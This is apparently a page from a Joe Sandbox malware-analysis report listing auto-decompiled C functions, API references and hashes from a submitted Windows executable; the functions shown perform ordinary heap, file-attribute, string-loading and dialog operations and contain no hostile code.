Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 3f050a3b2697a0403840a72e142325cef508019d9d5c9c0de49739330f631865
Instruction ID: 101dd8bdeb8fb5303ddbcbe3ee8c40d69637071945bba773a16741800e1ad84e
Opcode Fuzzy Hash: 3f050a3b2697a0403840a72e142325cef508019d9d5c9c0de49739330f631865
Instruction Fuzzy Hash: B311E531600700EBE734C628C880BA6B7ECEB45370F504AAAE152D26D0D77AED49C760

Uniqueness

Uniqueness Score: -1.00%

Function 00B88E54 Relevance: 3.0, APIs: 2, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00B88E54(void* __ecx, void* __edx, void* _a4, long _a8) {
				void* _t4;
				long _t7;
				void* _t9;
				void* _t13;
				void* _t14;
				long _t16;

				_t13 = __edx;
				_t10 = __ecx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = HeapReAlloc( *0xbc26e4, 0, _t14, _t16);
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E00B88C34();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E00B87A5E(_t10, _t13, __eflags, _t16);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E00B891A8())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E00B88DCC(_t14);
					goto L6;
				}
				_t9 = E00B88E06(__ecx, _a8); // executed
				return _t9;
			}

0x00b88e54
0x00b88e54
0x00b88e5a
0x00b88e5f
0x00b88e6d
0x00b88e70
0x00b88e72
0x00b88e7d
0x00b88e80
0x00b88ea7
0x00b88eb1
0x00b88eb7
0x00b88eb9
0x00000000
0x00000000
0x00b88e98
0x00b88e9a
0x00000000
0x00000000
0x00b88e9d
0x00b88ea2
0x00b88ea3
0x00b88ea5
0x00000000
0x00000000
0x00b88ea5
0x00b88e8f
0x00000000
0x00b88e8f
0x00b88e82
0x00b88e87
0x00b88e8d
0x00b88e8d
0x00b88e8d
0x00000000
0x00b88e8d
0x00b88e75
0x00000000
0x00b88e7a
0x00b88e64
0x00000000

APIs

_free.LIBCMT ref: 00B88E75

Part of subcall function 00B88E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B84286,?,0000015D,?,?,?,?,00B85762,000000FF,00000000,?,?), ref: 00B88E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00BA1098,00B617CE,?,?,00000007,?,?,?,00B613D6,?,00000000), ref: 00B88EB1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 936f0921066dd102f2624f985735120eb3b7fe9aeb349f2a58d6b4b0a130da08
Instruction ID: 6914ca641c6c0951fe6e71e239b7693d3d48838c6a4f6b1efec167ac9e11a44d
Opcode Fuzzy Hash: 936f0921066dd102f2624f985735120eb3b7fe9aeb349f2a58d6b4b0a130da08
Instruction Fuzzy Hash: A9F0C232205102A7CB217A25AC05B6F37D8CF81B72BA401A6F814A61B1DF70DD01C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B7109E Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7109E(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;
				void* _t14;
				signed int _t15;
				signed int _t17;

				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
				if(_t8 != 0) {
					_t14 = 0;
					_t17 = _v8;
					_t15 = 1;
					do {
						if((_t17 & _t15) != 0) {
							_t14 = _t14 + 1;
						}
						_t15 = _t15 + _t15;
					} while (_t15 != 0);
					if(_t14 >= 1) {
						return _t14;
					}
					return 1;
				} else {
					return _t8 + 1;
				}
			}

0x00b710b2
0x00b710ba
0x00b710c1
0x00b710c5
0x00b710c8
0x00b710ca
0x00b710cc
0x00b710ce
0x00b710ce
0x00b710cf
0x00b710cf
0x00b710d6
0x00000000
0x00b710d8
0x00b710db
0x00b710bc
0x00b710be
0x00b710be

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00B710AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 00B710B2

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 680e3300a13e7cba8ef8b487b3aa7ecd59f0c599d93408817918e8f01c04f9d5
Instruction ID: ed4fdb14a3725c574bc8668acc1c14a392e219a68a7e51e93e99a0c1b4aa4490
Opcode Fuzzy Hash: 680e3300a13e7cba8ef8b487b3aa7ecd59f0c599d93408817918e8f01c04f9d5
Instruction Fuzzy Hash: 56E0D832B00145ABCF198BBC9C159EB73EDEA44604314C5B7E427D3101F930DE414670

Uniqueness

Uniqueness Score: -1.00%

Function 00B6E648 Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B6E648(void* __eflags, int _a4, WCHAR* _a8, int _a12) {
				int _t11;
				void* _t14;
				WCHAR* _t15;

				_t15 = _a8;
				 *_t15 = 0;
				if(E00B6D9B0(0xba1030, _t14, __eflags, _a4, _t15, _a12, 0, 0) == 0) {
					_t11 = LoadStringW( *0xba1028, _a4, _t15, _a12); // executed
					if(_t11 == 0) {
						LoadStringW( *0xba102c, _a4, _t15, _a12);
					}
				}
				return _t15;
			}

0x00b6e64c
0x00b6e65b
0x00b6e669
0x00b6e678
0x00b6e680
0x00b6e68f
0x00b6e68f
0x00b6e680
0x00b6e699

APIs

LoadStringW.USER32(00B613B6,?,00BA1098,00B613B6), ref: 00B6E678
LoadStringW.USER32(00B613B6,?,00BA1098), ref: 00B6E68F

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: e8805af90509495262b837fe17b56ea7726a83cc19608b1565197e95324199de
Instruction ID: af8f200b500ca46c1169963c68e5f06b3d915e84da570a3e3774c9394b018269
Opcode Fuzzy Hash: e8805af90509495262b837fe17b56ea7726a83cc19608b1565197e95324199de
Instruction Fuzzy Hash: CBF01C3A100259BFCF121F65EC04CEB7FA9FF1A391B048455FE1896130D632C960EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B6A4ED Relevance: 3.0, APIs: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B6A4ED(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t13;
				signed int _t19;
				signed int _t20;

				E00B7EC50(0x1000);
				_t13 = SetFileAttributesW(_a4, _a8); // executed
				_t20 = _t19 & 0xffffff00 | _t13 != 0x00000000;
				if(_t13 == 0 && E00B6BB03(_a4,  &_v4100, 0x800) != 0) {
					_t20 = _t20 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t20;
			}

0x00b6a4f5
0x00b6a501
0x00b6a509
0x00b6a50e
0x00b6a53a
0x00b6a53a
0x00b6a541

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B6A325,?,?,?,00B6A175,?,00000001,00000000,?,?), ref: 00B6A501

Part of subcall function 00B6BB03: _wcslen.LIBCMT ref: 00B6BB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B6A325,?,?,?,00B6A175,?,00000001,00000000,?,?), ref: 00B6A532

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 983bec0e13607351069d8d1c12648ebeb8c7fb5fc5a75296cb74f269af7023d3
Instruction ID: c5e7dfcdb3c97d26aab3f2e806b662721f481e982533505f9f542f5b6efff1bc
Opcode Fuzzy Hash: 983bec0e13607351069d8d1c12648ebeb8c7fb5fc5a75296cb74f269af7023d3
Instruction Fuzzy Hash: 8FF030312401097BDF016F61DC45FDA37ECEF14785F488091B949E6160EB75DED4DA50

Uniqueness

Uniqueness Score: -1.00%

Function 00B6A1E0 Relevance: 3.0, APIs: 2, Instructions: 27
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B6A1E0(WCHAR* _a4) {
				short _v4100;
				int _t11;
				signed int _t17;
				signed int _t18;

				E00B7EC50(0x1000);
				_t11 = DeleteFileW(_a4); // executed
				_t18 = _t17 & 0xffffff00 | _t11 != 0x00000000;
				if(_t11 == 0 && E00B6BB03(_a4,  &_v4100, 0x800) != 0) {
					_t18 = _t18 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t18;
			}

0x00b6a1e8
0x00b6a1f1
0x00b6a1f9
0x00b6a1fe
0x00b6a227
0x00b6a227
0x00b6a22e

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,00B6977F,?,?,00B695CF,?,?,?,?,?,00B92641,000000FF), ref: 00B6A1F1

Part of subcall function 00B6BB03: _wcslen.LIBCMT ref: 00B6BB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00B6977F,?,?,00B695CF,?,?,?,?,?,00B92641), ref: 00B6A21F

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 995c3cca9ad5ceae0269a2d569dcbef06cf25b607fcdcb35f8af365f140d00bf
Instruction ID: fd3b1fdd891303e8a0365dbd103ff4a33ebba837915294574e57d9b6c31bfdc7
Opcode Fuzzy Hash: 995c3cca9ad5ceae0269a2d569dcbef06cf25b607fcdcb35f8af365f140d00bf
Instruction Fuzzy Hash: 2DE092351402096BEF025F60DC86FD937ECFF0C785F4840A1B944E2050EB65DEC4DA50

Uniqueness

Uniqueness Score: -1.00%

Function 00B7AC7C Relevance: 3.0, APIs: 2, Instructions: 26
comCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00B7AC7C(void* __ecx) {
				intOrPtr _v16;
				intOrPtr* _t5;
				void* _t8;
				void* _t13;
				void* _t16;
				intOrPtr _t19;

				 *[fs:0x0] = _t19;
				_t5 =  *0xba8438; // 0x7645c100
				 *0xb93278(_t5, _t13, _t16,  *[fs:0x0], 0xb92641, 0xffffffff);
				 *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))();
				L00B7EB32(); // executed
				_t8 =  *0xbc3178( *((intOrPtr*)(__ecx + 4))); // executed
				 *[fs:0x0] = _v16;
				return _t8;
			}

0x00b7ac8d
0x00b7ac94
0x00b7aca5
0x00b7acab
0x00b7acb0
0x00b7acb5
0x00b7acbf
0x00b7acc8

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00B92641,000000FF), ref: 00B7ACB0
OleUninitialize.OLE32(?,?,?,?,00B92641,000000FF), ref: 00B7ACB5

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 9e09234c14ad6e86eb0ca35ab3d879f1b6200869cbeac7ab457405f43171d92e
Instruction ID: 2aefe159e480f95f678edd2ff53e371e417ecca4985b2300b91c3314a87384ff
Opcode Fuzzy Hash: 9e09234c14ad6e86eb0ca35ab3d879f1b6200869cbeac7ab457405f43171d92e
Instruction Fuzzy Hash: 61E03972604650EFCA009B58DC46B49FBE8FB89B20F0442AAA41693BA0CF74A800CA90

Uniqueness

Uniqueness Score: -1.00%

Function 00B6A243 Relevance: 3.0, APIs: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B6A243(WCHAR* _a4) {
				short _v4100;
				long _t7;
				long _t12;
				long _t13;

				E00B7EC50(0x1000);
				_t7 = GetFileAttributesW(_a4); // executed
				_t13 = _t7;
				if(_t13 == 0xffffffff && E00B6BB03(_a4,  &_v4100, 0x800) != 0) {
					_t12 = GetFileAttributesW( &_v4100); // executed
					_t13 = _t12;
				}
				return _t13;
			}

0x00b6a24b
0x00b6a254
0x00b6a25a
0x00b6a25f
0x00b6a280
0x00b6a286
0x00b6a286
0x00b6a28c

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00B6A23A,?,00B6755C,?,?,?,?), ref: 00B6A254

Part of subcall function 00B6BB03: _wcslen.LIBCMT ref: 00B6BB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00B6A23A,?,00B6755C,?,?,?,?), ref: 00B6A280

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 3dba35c57b224fb647800fda55a09fb2fbd0beabe1cbbb33cc02fc34cf64c5f3
Instruction ID: 288f4765286589a1c0ecb71101a99b1630a09796b79827a0fc5a3ed973b8c9d8
Opcode Fuzzy Hash: 3dba35c57b224fb647800fda55a09fb2fbd0beabe1cbbb33cc02fc34cf64c5f3
Instruction Fuzzy Hash: F1E092355001245BCF21AB64CC05BD9B7E8EB087E1F0442A1FD54E3190DB74DE84CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B7DEC2 Relevance: 3.0, APIs: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7DEC2(void* __eflags, intOrPtr _a4, signed char _a16) {
				short _v5124;

				E00B7EC50(0x1400);
				E00B64092( &_v5124, 0xa00, E00B6E617((_a16 & 0x000000ff) + 0x65), _a4);
				SetDlgItemTextW( *0xba8458, 0x65,  &_v5124); // executed
				return E00B7B568() & 0xffffff00 |  *0xba8454 == 0x00000000;
			}

0x00b7deca
0x00b7deec
0x00b7df03
0x00b7df19

APIs

_swprintf.LIBCMT ref: 00B7DEEC

Part of subcall function 00B64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B640A5

SetDlgItemTextW.USER32(00000065,?), ref: 00B7DF03

Part of subcall function 00B7B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B7B579
Part of subcall function 00B7B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B7B58A
Part of subcall function 00B7B568: IsDialogMessageW.USER32(0001042A,?), ref: 00B7B59E
Part of subcall function 00B7B568: TranslateMessage.USER32(?), ref: 00B7B5AC
Part of subcall function 00B7B568: DispatchMessageW.USER32(?), ref: 00B7B5B6

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 050d23597436697d8aa4b6fa67b3f87a6193b9a773ef39821ea427370d8cd15b
Instruction ID: d879792f68288b07bb3686d322c3108b4919bb91a8ded5e452ec189fed159f83
Opcode Fuzzy Hash: 050d23597436697d8aa4b6fa67b3f87a6193b9a773ef39821ea427370d8cd15b
Instruction Fuzzy Hash: 3CE09B7640024866DF02A764DC07FDE37EC5B09785F444491B215D71A2DE78DA108761

Uniqueness

Uniqueness Score: -1.00%

Function 00B7081B Relevance: 3.0, APIs: 2, Instructions: 24
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7081B(intOrPtr _a4) {
				short _v4100;
				int _t8;
				struct HINSTANCE__* _t12;

				E00B7EC50(0x1000);
				_t8 = GetSystemDirectoryW( &_v4100, 0x800);
				_t14 = _t8;
				if(_t8 != 0) {
					E00B6BDF3(_t14,  &_v4100, _a4,  &_v4100, 0x800);
					_t12 = LoadLibraryW( &_v4100); // executed
					return _t12;
				}
				return _t8;
			}

0x00b70823
0x00b70836
0x00b7083c
0x00b7083e
0x00b7084c
0x00b70858
0x00000000
0x00b70858
0x00b70860

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B70836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B6F2D8,Crypt32.dll,00000000,00B6F35C,?,?,00B6F33E,?,?,?), ref: 00B70858

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 6a4479ca0bf3acbcbfdf10ce84572b27b5babbf015ba5c4e5ce2240052c374ab
Instruction ID: a7c7d360276ecbadac8d6d14550869088e726c81943ffb498d180ba4cf588a54
Opcode Fuzzy Hash: 6a4479ca0bf3acbcbfdf10ce84572b27b5babbf015ba5c4e5ce2240052c374ab
Instruction Fuzzy Hash: 31E048764001186BDB11A7A4DD09FDB77ECEF0D7D1F0440A67649D3004DA74DA84CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00B7A3B9 Relevance: 3.0, APIs: 2, Instructions: 23
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00B7A3B9(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t10 =  &_v8;
				_v8 = __ecx;
				_v8 = _v8 & 0x00000000;
				_push(_t10);
				_push(_a4);
				 *__ecx = 0xb94740;
				if(_a8 == 0) {
					L00B7EB1A(); // executed
				} else {
					L00B7EB20();
				}
				 *((intOrPtr*)(_t15 + 8)) = _t10;
				 *(_t15 + 4) = _v8;
				return _t15;
			}

0x00b7a3bc
0x00b7a3be
0x00b7a3c0
0x00b7a3c3
0x00b7a3c6
0x00b7a3ce
0x00b7a3cf
0x00b7a3d2
0x00b7a3d8
0x00b7a3e1
0x00b7a3da
0x00b7a3da
0x00b7a3da
0x00b7a3e6
0x00b7a3ec
0x00b7a3f3

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B7A3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00B7A3E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 01e5ac74b7d7a66e2f2596ad9f8862e2eeb5aea22f91a479663856014fb2a9f6
Instruction ID: ee2f534e180bfe2f6a1dca39821e1130b939e030263c3dcddd2911da3983ed44
Opcode Fuzzy Hash: 01e5ac74b7d7a66e2f2596ad9f8862e2eeb5aea22f91a479663856014fb2a9f6
Instruction Fuzzy Hash: 54E0ED71504218EFCB50DF95C541B9DBBE8EF08364F10C49AA86A93301E374AE04DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B82B8C Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00B82B8C(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t7;
				void* _t9;

				_t1 = E00B83C57(__ecx, __eflags, E00B82AD0); // executed
				 *0xb9e7d0 = _t1;
				_pop(_t7);
				if(_t1 != 0xffffffff) {
					_t2 = E00B83D08(_t7, __eflags, _t1, 0xbc2060);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E00B82BBF(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x00b82b91
0x00b82b96
0x00b82b9b
0x00b82b9f
0x00b82baa
0x00b82bb0
0x00b82bb1
0x00b82bb3
0x00b82bbe
0x00b82bb5
0x00b82bb5
0x00000000
0x00b82bb5
0x00b82ba1
0x00b82ba1
0x00b82ba3
0x00b82ba3

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B82BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00B82BB5

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: c0b0b4e3b876e3bc2e715f5e8186f86512e6d58108c5b6da99fae692dc05d3cd
Instruction ID: c640cde34cc1193197607e6c94ac236f9c721206a09a798fd56952ef38fb69e1
Opcode Fuzzy Hash: c0b0b4e3b876e3bc2e715f5e8186f86512e6d58108c5b6da99fae692dc05d3cd
Instruction Fuzzy Hash: 5ED0223815730018AC187FB02B0394833C5ED41F707A046DBF831864F1EE20C480E322

Uniqueness

Uniqueness Score: -1.00%

Function 00B612F1 Relevance: 3.0, APIs: 2, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00B612F1(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}

0x00b612f8
0x00b6130d
0x00b61313

APIs

GetDlgItem.USER32(?,?), ref: 00B61306
ShowWindow.USER32(00000000), ref: 00B6130D

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
